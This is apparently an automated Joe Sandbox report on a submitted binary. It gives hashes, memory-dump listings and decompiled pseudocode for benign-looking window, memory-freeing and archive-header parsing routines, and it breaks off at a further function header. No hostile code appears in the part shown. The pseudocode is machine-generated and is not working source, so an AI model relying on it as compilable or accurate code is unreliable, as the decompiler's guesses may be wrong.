Instruction ID: 12c79221eb10cf9dc399fbf21feb740951366e620e0462b8eaee7850d3d1955d
Opcode Fuzzy Hash: e5d5ad80cdb2a0610df01052857d82138ff2a953d9d7afb12311a19613ab6d4a
Instruction Fuzzy Hash: 69317C32604244AFDB20AA79D845F5ABBE9FF50720F1858ADF04CE7192DF31AC40CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00BBCBAE Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 79
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BBCBAE(void* __ecx, void* __edx, void* __eflags, void* __fp0, short _a24, struct HWND__* _a4124) {
				void _v0;
				intOrPtr _v4;
				intOrPtr _v12;
				struct HWND__* _t8;
				void* _t18;
				void* _t25;
				void* _t27;
				void* _t29;
				struct HWND__* _t32;
				struct HWND__* _t35;
				void* _t48;

				_t48 = __fp0;
				_t27 = __edx;
				E00BBE1C0();
				_t8 = E00BB9C8A(__eflags);
				if(_t8 == 0) {
					L12:
					return _t8;
				}
				_t8 = GetWindow(_a4124, 5);
				_t32 = _t8;
				_t29 = 0;
				_t35 = _t32;
				if(_t32 == 0) {
					L11:
					goto L12;
				}
				while(_t29 < 0x200) {
					GetClassNameW(_t32,  &_a24, 0x800);
					if(E00BB1708( &_a24, L"STATIC") == 0 && (GetWindowLongW(_t32, 0xfffffff0) & 0x0000001f) == 0xe) {
						_t25 = SendMessageW(_t32, 0x173, 0, 0);
						if(_t25 != 0) {
							GetObjectW(_t25, 0x18,  &_v0);
							_t18 = E00BB9CEC(_v4);
							SendMessageW(_t32, 0x172, 0, E00BB9EDB(_t27, _t48, _t25, E00BB9CA9(_v12), _t18));
							DeleteObject(_t25);
						}
					}
					_t8 = GetWindow(_t32, 2);
					_t32 = _t8;
					if(_t32 != _t35) {
						_t29 = _t29 + 1;
						if(_t32 != 0) {
							continue;
						}
					}
					break;
				}
				goto L11;
			}

0x00bbcbae
0x00bbcbae
0x00bbcbb3
0x00bbcbb8
0x00bbcbbf
0x00bbcc96
0x00bbcc9c
0x00bbcc9c
0x00bbcbd1
0x00bbcbd7
0x00bbcbd9
0x00bbcbdb
0x00bbcbdf
0x00bbcc93
0x00000000
0x00bbcc95
0x00bbcbe6
0x00bbcbfd
0x00bbcc14
0x00bbcc36
0x00bbcc3a
0x00bbcc44
0x00bbcc4e
0x00bbcc6d
0x00bbcc74
0x00bbcc74
0x00bbcc3a
0x00bbcc7d
0x00bbcc83
0x00bbcc87
0x00bbcc89
0x00bbcc8c
0x00000000
0x00000000
0x00bbcc8c
0x00000000
0x00bbcc87
0x00000000

APIs

GetWindow.USER32(?,00000005), ref: 00BBCBD1
GetClassNameW.USER32(00000000,?,00000800), ref: 00BBCBFD

Part of subcall function 00BB1708: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011708,00BABA45,00000000,.exe,?,?,00000800,?,?,00BB854F,?), ref: 00BB171E

GetWindowLongW.USER32(00000000,000000F0), ref: 00BBCC19
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00BBCC30
GetObjectW.GDI32(00000000,00000018,?), ref: 00BBCC44

Part of subcall function 00BB9CEC: GetDC.USER32(00000000), ref: 00BB9CF8
Part of subcall function 00BB9CEC: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BB9D07
Part of subcall function 00BB9CEC: ReleaseDC.USER32(00000000,00000000), ref: 00BB9D15

Part of subcall function 00BB9CA9: GetDC.USER32(00000000), ref: 00BB9CB5
Part of subcall function 00BB9CA9: GetDeviceCaps.GDI32(00000000,00000058), ref: 00BB9CC4
Part of subcall function 00BB9CA9: ReleaseDC.USER32(00000000,00000000), ref: 00BB9CD2

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00BBCC6D
DeleteObject.GDI32(00000000), ref: 00BBCC74
GetWindow.USER32(00000000,00000002), ref: 00BBCC7D

Strings

t, xrefs: 00BBCC19
STATIC, xrefs: 00BBCC03

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: Window$CapsDeviceMessageObjectReleaseSend$ClassCompareDeleteLongNameString
String ID: STATIC$t
API String ID: 1444658586-1388717703
Opcode ID: c07d6792b13812d6176120ff8e0a6a17cd91d0855aba3a5430c6b1f806965ad6
Instruction ID: 470be01d7e9cd2f063dca790d11cca90d0b98d44cc2dbeb1abc22ee59315f568
Opcode Fuzzy Hash: c07d6792b13812d6176120ff8e0a6a17cd91d0855aba3a5430c6b1f806965ad6
Instruction Fuzzy Hash: 2A1121322443507BE721AB709C4AFFFBEDCEF54741F054461FE8AA1092CAE0890586E0

Uniqueness

Uniqueness Score: -1.00%

Function 00BC8D31 Relevance: 15.1, APIs: 10, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BC8D31(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0xbd4eb0) {
					E00BC835E(_t52);
					_t26 = _a4;
				}
				E00BC835E( *((intOrPtr*)(_t26 + 0x3c)));
				E00BC835E( *((intOrPtr*)(_a4 + 0x30)));
				E00BC835E( *((intOrPtr*)(_a4 + 0x34)));
				E00BC835E( *((intOrPtr*)(_a4 + 0x38)));
				E00BC835E( *((intOrPtr*)(_a4 + 0x28)));
				E00BC835E( *((intOrPtr*)(_a4 + 0x2c)));
				E00BC835E( *((intOrPtr*)(_a4 + 0x40)));
				E00BC835E( *((intOrPtr*)(_a4 + 0x44)));
				E00BC835E( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E00BC8BF6(5,  &_v8);
				_v8 =  &_a4;
				return E00BC8C46(4,  &_v8);
			}

0x00bc8d37
0x00bc8d3a
0x00bc8d42
0x00bc8d45
0x00bc8d4a
0x00bc8d4d
0x00bc8d51
0x00bc8d5c
0x00bc8d67
0x00bc8d72
0x00bc8d7d
0x00bc8d88
0x00bc8d93
0x00bc8d9e
0x00bc8dac
0x00bc8db4
0x00bc8dbd
0x00bc8dc5
0x00bc8dd9

APIs

_free.LIBCMT ref: 00BC8D45

Part of subcall function 00BC835E: RtlFreeHeap.NTDLL(00000000,00000000,?,00BCBE76,?,00000000,?,00000000,?,00BCBE9D,?,00000007,?,?,00BCC29A,?), ref: 00BC8374
Part of subcall function 00BC835E: GetLastError.KERNEL32(?,?,00BCBE76,?,00000000,?,00000000,?,00BCBE9D,?,00000007,?,?,00BCC29A,?,?), ref: 00BC8386

_free.LIBCMT ref: 00BC8D51
_free.LIBCMT ref: 00BC8D5C
_free.LIBCMT ref: 00BC8D67
_free.LIBCMT ref: 00BC8D72
_free.LIBCMT ref: 00BC8D7D
_free.LIBCMT ref: 00BC8D88
_free.LIBCMT ref: 00BC8D93
_free.LIBCMT ref: 00BC8D9E
_free.LIBCMT ref: 00BC8DAC

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c1a3a0c8d24f48e7677ee9ab7e036f57f6738dc8ef33240cc8c9522484ae7229
Instruction ID: 97c0a06fc5cd5fd23b12dd30555034788f63bcb007b98fcafb2760d7167dfe6c
Opcode Fuzzy Hash: c1a3a0c8d24f48e7677ee9ab7e036f57f6738dc8ef33240cc8c9522484ae7229
Instruction Fuzzy Hash: AB11E376104048BFCB11EF94C842EDD3BE5FF44750B0594E9BA1C8F2A2DA32EE509B84

Uniqueness

Uniqueness Score: -1.00%

Function 00BA214E Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00BA214E(intOrPtr __ecx) {
				signed int _t135;
				void* _t137;
				signed int _t139;
				unsigned int _t140;
				signed int _t144;
				signed int _t161;
				signed int _t164;
				void* _t167;
				void* _t172;
				signed int _t175;
				signed char _t178;
				signed char _t179;
				signed char _t180;
				signed int _t182;
				signed int _t185;
				signed int _t187;
				signed int _t188;
				signed char _t220;
				signed char _t232;
				signed int _t233;
				signed int _t236;
				intOrPtr _t240;
				signed int _t244;
				signed int _t246;
				signed int _t247;
				signed int _t257;
				signed int _t258;
				signed char _t262;
				signed int _t263;
				signed int _t265;
				intOrPtr _t272;
				intOrPtr _t275;
				intOrPtr _t278;
				intOrPtr _t314;
				signed int _t315;
				intOrPtr _t318;
				signed int _t322;
				void* _t323;
				void* _t324;
				void* _t326;
				void* _t327;
				void* _t328;
				void* _t329;
				void* _t330;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;
				intOrPtr* _t336;
				signed int _t339;
				void* _t340;
				signed int _t341;
				char* _t342;
				void* _t343;
				void* _t344;
				signed int _t348;
				signed int _t351;
				signed int _t366;

				E00BBE1C0();
				_t318 =  *((intOrPtr*)(_t344 + 0x20b8));
				 *((intOrPtr*)(_t344 + 0xc)) = __ecx;
				_t314 =  *((intOrPtr*)(_t318 + 0x18));
				_t135 = _t314 -  *((intOrPtr*)(_t344 + 0x20bc));
				if(_t135 <  *(_t318 + 0x1c)) {
					L104:
					return _t135;
				}
				_t315 = _t314 - _t135;
				 *(_t318 + 0x1c) = _t135;
				if(_t315 >= 2) {
					_t240 =  *((intOrPtr*)(_t344 + 0x20c4));
					while(1) {
						_t135 = E00BAC620(_t315);
						_t244 = _t135;
						_t348 = _t315;
						if(_t348 < 0 || _t348 <= 0 && _t244 == 0) {
							break;
						}
						_t322 =  *(_t318 + 0x1c);
						_t135 =  *((intOrPtr*)(_t318 + 0x18)) - _t322;
						if(_t135 == 0) {
							break;
						}
						_t351 = _t315;
						if(_t351 > 0 || _t351 >= 0 && _t244 > _t135) {
							break;
						} else {
							_t339 = _t322 + _t244;
							 *(_t344 + 0x28) = _t339;
							_t137 = E00BAC620(_t315);
							_t340 = _t339 -  *(_t318 + 0x1c);
							_t323 = _t137;
							_t135 = _t315;
							_t246 = 0;
							 *(_t344 + 0x24) = _t135;
							 *(_t344 + 0x20) = 0;
							if(0 < 0 || 0 <= 0 && _t340 < 0) {
								break;
							} else {
								if( *((intOrPtr*)(_t240 + 4)) == 1 && _t323 == 1 && _t135 == 0) {
									 *((char*)(_t240 + 0x1e)) = 1;
									_t232 = E00BAC620(_t315);
									 *(_t344 + 0x1c) = _t232;
									if((_t232 & 0x00000001) != 0) {
										_t236 = E00BAC620(_t315);
										if((_t236 | _t315) != 0) {
											asm("adc eax, edx");
											 *((intOrPtr*)(_t240 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca0)) + _t236;
											 *((intOrPtr*)(_t240 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca4));
										}
										_t232 =  *(_t344 + 0x1c);
									}
									if((_t232 & 0x00000002) != 0) {
										_t233 = E00BAC620(_t315);
										if((_t233 | _t315) != 0) {
											asm("adc eax, edx");
											 *((intOrPtr*)(_t240 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca0)) + _t233;
											 *((intOrPtr*)(_t240 + 0x34)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca4));
										}
									}
									_t246 =  *(_t344 + 0x20);
									_t135 =  *(_t344 + 0x24);
								}
								if( *((intOrPtr*)(_t240 + 4)) == 2 ||  *((intOrPtr*)(_t240 + 4)) == 3) {
									_t366 = _t135;
									if(_t366 > 0 || _t366 >= 0 && _t323 > 7) {
										goto L102;
									} else {
										_t324 = _t323 - 1;
										if(_t324 == 0) {
											_t139 = E00BAC620(_t315);
											__eflags = _t139;
											if(_t139 == 0) {
												_t140 = E00BAC620(_t315);
												 *(_t240 + 0x10c1) = _t140 & 0x00000001;
												 *(_t240 + 0x10ca) = _t140 >> 0x00000001 & 0x00000001;
												_t144 = E00BAC4D3(_t318) & 0x000000ff;
												 *(_t240 + 0x10ec) = _t144;
												__eflags = _t144 - 0x18;
												if(_t144 > 0x18) {
													E00BA3FD6(_t344 + 0x38, 0x14, L"xc%u", _t144);
													_t257 =  *(_t344 + 0x28);
													_t167 = _t344 + 0x40;
													_t344 = _t344 + 0x10;
													E00BA3F81(_t257, _t240 + 0x28, _t167);
												}
												E00BAC582(_t318, _t240 + 0x10a1, 0x10);
												E00BAC582(_t318, _t240 + 0x10b1, 0x10);
												__eflags =  *(_t240 + 0x10c1);
												if( *(_t240 + 0x10c1) != 0) {
													_t325 = _t240 + 0x10c2;
													E00BAC582(_t318, _t240 + 0x10c2, 8);
													E00BAC582(_t318, _t344 + 0x30, 4);
													E00BAF807(_t344 + 0x58);
													E00BAF84D(_t344 + 0x60, _t240 + 0x10c2, 8);
													_push(_t344 + 0x30);
													E00BAF716(_t344 + 0x5c);
													_t161 = E00BBFC4A(_t344 + 0x34, _t344 + 0x34, 4);
													_t344 = _t344 + 0xc;
													asm("sbb al, al");
													__eflags =  *((intOrPtr*)(_t240 + 4)) - 3;
													 *(_t240 + 0x10c1) =  ~_t161 + 1;
													if( *((intOrPtr*)(_t240 + 4)) == 3) {
														_t164 = E00BBFC4A(_t325, 0xbd2668, 8);
														_t344 = _t344 + 0xc;
														__eflags = _t164;
														if(_t164 == 0) {
															 *(_t240 + 0x10c1) = _t164;
														}
													}
												}
												 *((char*)(_t240 + 0x10a0)) = 1;
												 *((intOrPtr*)(_t240 + 0x109c)) = 5;
												 *((char*)(_t240 + 0x109b)) = 1;
											} else {
												E00BA3FD6(_t344 + 0x38, 0x14, L"x%u", _t139);
												_t258 =  *(_t344 + 0x28);
												_t172 = _t344 + 0x40;
												_t344 = _t344 + 0x10;
												E00BA3F81(_t258, _t240 + 0x28, _t172);
											}
											goto L102;
										}
										_t326 = _t324 - 1;
										if(_t326 == 0) {
											_t175 = E00BAC620(_t315);
											__eflags = _t175;
											if(_t175 != 0) {
												goto L102;
											}
											_push(0x20);
											 *((intOrPtr*)(_t240 + 0x1070)) = 3;
											_push(_t240 + 0x1074);
											L40:
											E00BAC582(_t318);
											goto L102;
										}
										_t327 = _t326 - 1;
										if(_t327 == 0) {
											__eflags = _t246;
											if(__eflags < 0) {
												goto L102;
											}
											if(__eflags > 0) {
												L65:
												_t178 = E00BAC620(_t315);
												 *(_t344 + 0x13) = _t178;
												_t179 = _t178 & 0x00000001;
												_t262 =  *(_t344 + 0x13);
												 *(_t344 + 0x14) = _t179;
												_t315 = _t262 & 0x00000002;
												__eflags = _t315;
												 *(_t344 + 0x15) = _t315;
												if(_t315 != 0) {
													_t278 = _t318;
													__eflags = _t179;
													if(__eflags == 0) {
														E00BB0D5C(_t240 + 0x1040, _t315, E00BAC562(_t278, __eflags), _t315);
													} else {
														E00BB0D1D(_t240 + 0x1040, _t315, E00BAC520(_t278), 0);
													}
													_t262 =  *(_t344 + 0x13);
													_t179 =  *(_t344 + 0x14);
												}
												_t263 = _t262 & 0x00000004;
												__eflags = _t263;
												 *(_t344 + 0x16) = _t263;
												if(_t263 != 0) {
													_t275 = _t318;
													__eflags = _t179;
													if(__eflags == 0) {
														E00BB0D5C(_t240 + 0x1048, _t315, E00BAC562(_t275, __eflags), _t315);
													} else {
														E00BB0D1D(_t240 + 0x1048, _t315, E00BAC520(_t275), 0);
													}
												}
												_t180 =  *(_t344 + 0x13);
												_t265 = _t180 & 0x00000008;
												__eflags = _t265;
												 *(_t344 + 0x17) = _t265;
												if(_t265 != 0) {
													__eflags =  *(_t344 + 0x14);
													_t272 = _t318;
													if(__eflags == 0) {
														E00BB0D5C(_t240 + 0x1050, _t315, E00BAC562(_t272, __eflags), _t315);
													} else {
														E00BB0D1D(_t240 + 0x1050, _t315, E00BAC520(_t272), 0);
													}
													_t180 =  *(_t344 + 0x13);
												}
												__eflags =  *(_t344 + 0x14);
												if( *(_t344 + 0x14) != 0) {
													__eflags = _t180 & 0x00000010;
													if((_t180 & 0x00000010) != 0) {
														__eflags =  *(_t344 + 0x15);
														if( *(_t344 + 0x15) == 0) {
															_t341 = 0x3fffffff;
															_t328 = 0x3b9aca00;
														} else {
															_t187 = E00BAC520(_t318);
															_t341 = 0x3fffffff;
															_t328 = 0x3b9aca00;
															_t188 = _t187 & 0x3fffffff;
															__eflags = _t188 - 0x3b9aca00;
															if(_t188 < 0x3b9aca00) {
																E00BB09DA(_t240 + 0x1040, _t188, 0);
															}
														}
														__eflags =  *(_t344 + 0x16);
														if( *(_t344 + 0x16) != 0) {
															_t185 = E00BAC520(_t318) & _t341;
															__eflags = _t185 - _t328;
															if(_t185 < _t328) {
																E00BB09DA(_t240 + 0x1048, _t185, 0);
															}
														}
														__eflags =  *(_t344 + 0x17);
														if( *(_t344 + 0x17) != 0) {
															_t182 = E00BAC520(_t318) & _t341;
															__eflags = _t182 - _t328;
															if(_t182 < _t328) {
																E00BB09DA(_t240 + 0x1050, _t182, 0);
															}
														}
													}
												}
												goto L102;
											}
											__eflags = _t340 - 5;
											if(_t340 < 5) {
												goto L102;
											}
											goto L65;
										}
										_t329 = _t327 - 1;
										if(_t329 == 0) {
											__eflags = _t246;
											if(__eflags < 0) {
												goto L102;
											}
											if(__eflags > 0) {
												L60:
												E00BAC620(_t315);
												__eflags = E00BAC620(_t315);
												if(__eflags != 0) {
													 *((char*)(_t240 + 0x10f3)) = 1;
													E00BA3FD6(_t344 + 0x38, 0x14, L";%u", _t203);
													_t344 = _t344 + 0x10;
													E00BAFD6E(__eflags, _t240 + 0x28, _t344 + 0x30, 0x800);
												}
												goto L102;
											}
											__eflags = _t340 - 1;
											if(_t340 < 1) {
												goto L102;
											}
											goto L60;
										}
										_t330 = _t329 - 1;
										if(_t330 == 0) {
											 *((intOrPtr*)(_t240 + 0x1100)) = E00BAC620(_t315);
											 *(_t240 + 0x2104) = E00BAC620(_t315) & 0x00000001;
											_t331 = E00BAC620(_t315);
											 *((char*)(_t344 + 0xc0)) = 0;
											__eflags = _t331 - 0x1fff;
											if(_t331 < 0x1fff) {
												E00BAC582(_t318, _t344 + 0xc4, _t331);
												 *((char*)(_t344 + _t331 + 0xc0)) = 0;
											}
											E00BABC60(_t344 + 0xc4, _t344 + 0xc4, 0x2000);
											_push(0x800);
											_push(_t240 + 0x1104);
											_push(_t344 + 0xc8);
											E00BB138C();
											goto L102;
										}
										_t332 = _t330 - 1;
										if(_t332 == 0) {
											_t220 = E00BAC620(_t315);
											 *(_t344 + 0x1c) = _t220;
											_t342 = _t240 + 0x2108;
											 *(_t240 + 0x2106) = _t220 >> 0x00000002 & 0x00000001;
											 *(_t240 + 0x2107) = _t220 >> 0x00000003 & 0x00000001;
											 *((char*)(_t240 + 0x2208)) = 0;
											 *_t342 = 0;
											__eflags = _t220 & 0x00000001;
											if((_t220 & 0x00000001) != 0) {
												_t334 = E00BAC620(_t315);
												__eflags = _t334 - 0xff;
												if(_t334 >= 0xff) {
													_t334 = 0xff;
												}
												E00BAC582(_t318, _t342, _t334);
												_t220 =  *(_t344 + 0x1c);
												 *((char*)(_t334 + _t342)) = 0;
											}
											__eflags = _t220 & 0x00000002;
											if((_t220 & 0x00000002) != 0) {
												_t333 = E00BAC620(_t315);
												__eflags = _t333 - 0xff;
												if(_t333 >= 0xff) {
													_t333 = 0xff;
												}
												_t343 = _t240 + 0x2208;
												E00BAC582(_t318, _t343, _t333);
												 *((char*)(_t333 + _t343)) = 0;
											}
											__eflags =  *(_t240 + 0x2106);
											if( *(_t240 + 0x2106) != 0) {
												 *((intOrPtr*)(_t240 + 0x2308)) = E00BAC620(_t315);
											}
											__eflags =  *(_t240 + 0x2107);
											if( *(_t240 + 0x2107) != 0) {
												 *((intOrPtr*)(_t240 + 0x230c)) = E00BAC620(_t315);
											}
											 *((char*)(_t240 + 0x2105)) = 1;
											goto L102;
										}
										if(_t332 != 1) {
											goto L102;
										}
										if( *((intOrPtr*)(_t240 + 4)) == 3 &&  *((intOrPtr*)(_t318 + 0x18)) -  *(_t344 + 0x28) == 1) {
											_t340 = _t340 + 1;
										}
										_t336 = _t240 + 0x1028;
										E00BA2020(_t336, _t340);
										_push(_t340);
										_push( *_t336);
										goto L40;
									}
								} else {
									L102:
									_t247 =  *(_t344 + 0x28);
									 *(_t318 + 0x1c) = _t247;
									_t135 =  *((intOrPtr*)(_t318 + 0x18)) - _t247;
									if(_t135 >= 2) {
										continue;
									}
									break;
								}
							}
						}
					}
				}
			}

0x00ba2153
0x00ba2159
0x00ba2160
0x00ba2164
0x00ba2169
0x00ba2173
0x00ba27ca
0x00ba27d1
0x00ba27d1
0x00ba2179
0x00ba217b
0x00ba2181
0x00ba2188
0x00ba2191
0x00ba2193
0x00ba2198
0x00ba219a
0x00ba219c
0x00000000
0x00000000
0x00ba21af
0x00ba21b2
0x00ba21b4
0x00000000
0x00000000
0x00ba21ba
0x00ba21bc
0x00000000
0x00ba21cc
0x00ba21cc
0x00ba21d1
0x00ba21d5
0x00ba21da
0x00ba21dd
0x00ba21df
0x00ba21e1
0x00ba21e3
0x00ba21e7
0x00ba21eb
0x00000000
0x00ba21fb
0x00ba21ff
0x00ba2210
0x00ba2214
0x00ba2219
0x00ba221f
0x00ba2223
0x00ba222c
0x00ba2244
0x00ba2246
0x00ba2249
0x00ba2249
0x00ba224c
0x00ba224c
0x00ba2252
0x00ba2256
0x00ba225f
0x00ba2277
0x00ba2279
0x00ba227c
0x00ba227c
0x00ba225f
0x00ba227f
0x00ba2283
0x00ba2283
0x00ba228b
0x00ba2297
0x00ba2299
0x00000000
0x00ba22aa
0x00ba22aa
0x00ba22ad
0x00ba265c
0x00ba2661
0x00ba2663
0x00ba2693
0x00ba26a1
0x00ba26a9
0x00ba26b4
0x00ba26b7
0x00ba26bd
0x00ba26c0
0x00ba26cf
0x00ba26d4
0x00ba26d8
0x00ba26dc
0x00ba26e4
0x00ba26e4
0x00ba26f4
0x00ba2704
0x00ba2709
0x00ba2710
0x00ba2718
0x00ba2721
0x00ba272f
0x00ba2739
0x00ba2746
0x00ba274f
0x00ba2755
0x00ba2766
0x00ba276b
0x00ba2770
0x00ba2774
0x00ba2778
0x00ba277e
0x00ba2788
0x00ba278d
0x00ba2790
0x00ba2792
0x00ba2794
0x00ba2794
0x00ba2792
0x00ba277e
0x00ba279a
0x00ba27a1
0x00ba27ab
0x00ba2665
0x00ba2672
0x00ba2677
0x00ba267b
0x00ba267f
0x00ba2687
0x00ba2687
0x00000000
0x00ba2663
0x00ba22b3
0x00ba22b6
0x00ba2635
0x00ba263a
0x00ba263c
0x00000000
0x00000000
0x00ba2642
0x00ba264a
0x00ba2654
0x00ba230b
0x00ba230d
0x00000000
0x00ba230d
0x00ba22bc
0x00ba22bf
0x00ba24b6
0x00ba24b8
0x00000000
0x00000000
0x00ba24be
0x00ba24c9
0x00ba24cb
0x00ba24d0
0x00ba24d4
0x00ba24d6
0x00ba24dc
0x00ba24e0
0x00ba24e0
0x00ba24e3
0x00ba24e7
0x00ba24e9
0x00ba24eb
0x00ba24ed
0x00ba2511
0x00ba24ef
0x00ba24fd
0x00ba24fd
0x00ba2516
0x00ba251a
0x00ba251a
0x00ba251e
0x00ba251e
0x00ba2521
0x00ba2525
0x00ba2527
0x00ba2529
0x00ba252b
0x00ba254f
0x00ba252d
0x00ba253b
0x00ba253b
0x00ba252b
0x00ba2554
0x00ba255a
0x00ba255a
0x00ba255d
0x00ba2561
0x00ba2563
0x00ba2568
0x00ba256a
0x00ba258e
0x00ba256c
0x00ba257a
0x00ba257a
0x00ba2593
0x00ba2593
0x00ba2597
0x00ba259c
0x00ba25a2
0x00ba25a4
0x00ba25aa
0x00ba25af
0x00ba25d8
0x00ba25dd
0x00ba25b1
0x00ba25b3
0x00ba25b8
0x00ba25bd
0x00ba25c2
0x00ba25c4
0x00ba25c6
0x00ba25d1
0x00ba25d1
0x00ba25c6
0x00ba25e2
0x00ba25e7
0x00ba25f0
0x00ba25f2
0x00ba25f4
0x00ba25ff
0x00ba25ff
0x00ba25f4
0x00ba2604
0x00ba2609
0x00ba2616
0x00ba2618
0x00ba261a
0x00ba2629
0x00ba2629
0x00ba261a
0x00ba2609
0x00ba25a4
0x00000000
0x00ba259c
0x00ba24c0
0x00ba24c3
0x00000000
0x00000000
0x00000000
0x00ba24c3
0x00ba22c5
0x00ba22c8
0x00ba2459
0x00ba245b
0x00000000
0x00000000
0x00ba2461
0x00ba246c
0x00ba246e
0x00ba247a
0x00ba247c
0x00ba248c
0x00ba2496
0x00ba249b
0x00ba24ac
0x00ba24ac
0x00000000
0x00ba247c
0x00ba2463
0x00ba2466
0x00000000
0x00000000
0x00000000
0x00ba2466
0x00ba22ce
0x00ba22d1
0x00ba23e4
0x00ba23f3
0x00ba23fe
0x00ba2400
0x00ba2408
0x00ba240e
0x00ba241b
0x00ba2420
0x00ba2420
0x00ba2436
0x00ba243b
0x00ba2446
0x00ba244e
0x00ba244f
0x00000000
0x00ba244f
0x00ba22d7
0x00ba22da
0x00ba2319
0x00ba2320
0x00ba2327
0x00ba2330
0x00ba233e
0x00ba2344
0x00ba234b
0x00ba234f
0x00ba2351
0x00ba235a
0x00ba2361
0x00ba2363
0x00ba2365
0x00ba2365
0x00ba236b
0x00ba2370
0x00ba2374
0x00ba2374
0x00ba2378
0x00ba237a
0x00ba2383
0x00ba238a
0x00ba238c
0x00ba238e
0x00ba238e
0x00ba2391
0x00ba239a
0x00ba239f
0x00ba239f
0x00ba23a3
0x00ba23aa
0x00ba23b3
0x00ba23b3
0x00ba23b9
0x00ba23c0
0x00ba23c9
0x00ba23c9
0x00ba23cf
0x00000000
0x00ba23cf
0x00ba22df
0x00000000
0x00000000
0x00ba22e9
0x00ba22f7
0x00ba22f7
0x00ba22fa
0x00ba2303
0x00ba2308
0x00ba2309
0x00000000
0x00ba2309
0x00ba27b2
0x00ba27b2
0x00ba27b2
0x00ba27b6
0x00ba27bc
0x00ba27c1
0x00000000
0x00000000
0x00000000
0x00ba27c1
0x00ba228b
0x00ba21eb
0x00ba21bc
0x00ba27c9

Strings

x%u, xrefs: 00BA2666
;%u, xrefs: 00BA2483
xc%u, xrefs: 00BA26C3

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID:
String ID: ;%u$x%u$xc%u
API String ID: 0-2277559157
Opcode ID: c0a4de182edea6fec3f422f375ca43731a6c83d082bf9bc5383e9d3360ca81ff
Instruction ID: d98e3fc7a27dac1c9687fba637dddc4d5a6ff3882952f071e76431eb0caee5fc
Opcode Fuzzy Hash: c0a4de182edea6fec3f422f375ca43731a6c83d082bf9bc5383e9d3360ca81ff
Instruction Fuzzy Hash: 91F10971A0C3405BDB15EF2C8895BFE7BD5AFA6300F0845E9FC869B283DA649D44C762

Uniqueness

Uniqueness Score: -1.00%

Function 00BBAC20 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98
windowCOMMON

Download Yara Rule

C-Code - Quality: 70%

